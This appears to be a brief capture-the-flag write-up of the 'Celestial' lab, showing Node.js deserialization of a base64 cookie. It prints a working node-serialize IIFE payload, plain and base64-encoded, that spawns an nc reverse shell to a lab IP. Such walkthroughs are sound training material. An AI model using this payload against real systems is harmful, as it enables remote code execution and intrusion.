Celestial

Short Snippet on Node JS deserialization

We are presented with a node.js application that upon refresh returns dynamic content.

Upon decoding the base64 cookie, we see that it is node JS. serialization

{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"3"}

The username field looks injectable, lets try to put our reverse shell payload in it.

{"username":"_$$ND_FUNC$$_function() {require('child_process').exec('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.2 1234>/tmp/f', (error, stdout, stderr) => { console.log(stdout); }); } ()"}
//encoded base64 version
eyJ1c2VybmFtZSI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbigpIHtyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygncm0gLWYgL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAuMTAuMTYuMiAxMjM0Pi90bXAvZicsIChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpID0+IHsgY29uc29sZS5sb2coc3Rkb3V0KTsgfSk7IH0gKCkifQ==

The $$NDFUNC$$ indicates the presence of embedded javascript and executes the rest of the following line (our reverse shell_) immediately because of the IIFE brackets added at the end which will invoke the function when the object is created.

With that, we get our shell.